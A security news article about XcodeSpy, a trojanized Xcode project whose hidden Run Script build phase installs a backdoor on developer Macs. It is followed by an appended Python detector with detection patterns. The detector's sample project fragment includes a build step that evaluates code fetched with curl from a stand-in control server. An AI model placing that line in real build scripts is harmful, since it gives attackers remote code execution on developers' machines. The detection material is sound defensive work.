XCodeSpy: Manipulated Xcode project to bring backdoor on developer Macs

Security researchers warn of new malware targeting Apple’s Xcode development environment, and thus iOS and Mac developers: a “trojanized Xcode project” has been found in the wild that tries to install a monitoring tool on the Mac used for software development, as reported by the security company SentinelOne. Once installed, the backdoor, which is based on the open source tool EggShell, can among other things record keystrokes and activate the microphone and camera.

The malware was delivered via a manipulated copy of the legitimate Xcode project TabBarInteraction, which is distributed via GitHub free of malware, as SentinelOne explains. The open source project aims to help developers animate tab bars in iOS apps. In addition to the original code, the malicious copy also contained a hidden “Run Script” build phase. It is executed during the build process and then tries to contact a control server to download and install the backdoor.

The manipulated Xcode project was probably in circulation between July and October 2020, and according to the security company there was at least one infection at a US company. There are also indications of attacks on developers in Asia. With the command

find . -name "project.pbxproj" -print0 | xargs -0 awk '/shellScript/ && /eval/{print "\033[37m" $0 "\033[31m" FILENAME}'

developers can manually search for shell scripts in Xcode projects, the security researchers say. They have also published a list of directories and files that may be an “indicator of compromise”, but since these can easily change at any time, they only reveal a past infection. Individual projects can be inspected for Run Scripts in the Build Phases tab in Xcode.
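As an added example (not the researchers' tool and not code from the article), the following Python script performs the same search as the find/awk one-liner above, but parses each Run Script body out of project.pbxproj and flags it against a small set of assumed heuristic patterns; it is run here against a constructed project fragment:

```python
import os
import re
import sys

# Constructed project.pbxproj fragment (not from the article): one Run Script
# phase that evaluates code fetched from a server, one benign linting phase.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AB12 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			name = "Run Script";
			shellPath = /bin/sh;
			shellScript = "eval \"$(curl -fsSL http://c2.example/stage)\"\n";
		};
		CD34 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellScript = "swiftlint lint --quiet\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

# Matches the quoted shellScript value, allowing escaped characters inside it.
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')
# Heuristic patterns (my assumption, not the researchers' list) worth a manual look.
SUSPICIOUS_RE = re.compile(r"\beval\b|\bcurl\b|\bwget\b|base64|bash -c|python -c")

def run_scripts(pbxproj_text):
    """Return every Run Script body in the project file, with escapes decoded."""
    return [m.group(1).encode().decode("unicode_escape")
            for m in SHELL_SCRIPT_RE.finditer(pbxproj_text)]

def flag_suspicious(pbxproj_text):
    """Return only the Run Script bodies that match a suspicious pattern."""
    return [s for s in run_scripts(pbxproj_text) if SUSPICIOUS_RE.search(s)]

def scan_tree(root):
    """Walk a directory like the find(1) command; map file path -> flagged scripts."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        if "project.pbxproj" in files:
            path = os.path.join(dirpath, "project.pbxproj")
            with open(path, encoding="utf-8", errors="replace") as fh:
                flagged = flag_suspicious(fh.read())
            if flagged:
                hits[path] = flagged
    return hits

if __name__ == "__main__":
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else flag_suspicious(SAMPLE_PBXPROJ))
```

A match is only a prompt to open the project's Build Phases tab and read the script; benign projects also use curl in build phases, so the list is a starting point, not a verdict.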


The purpose of infiltrating the backdoor remains unclear. Security researchers speculate that it was a targeted attack on certain developers. Developers are generally an attractive target, for example to collect Apple IDs for spreading malware. It would also be conceivable to smuggle malicious code into programs built with Xcode in this way. Around six years ago, “XcodeGhost” caused a sensation: a manipulated version of Xcode ensured that malware made its way into the App Store – including into popular apps such as WeChat.
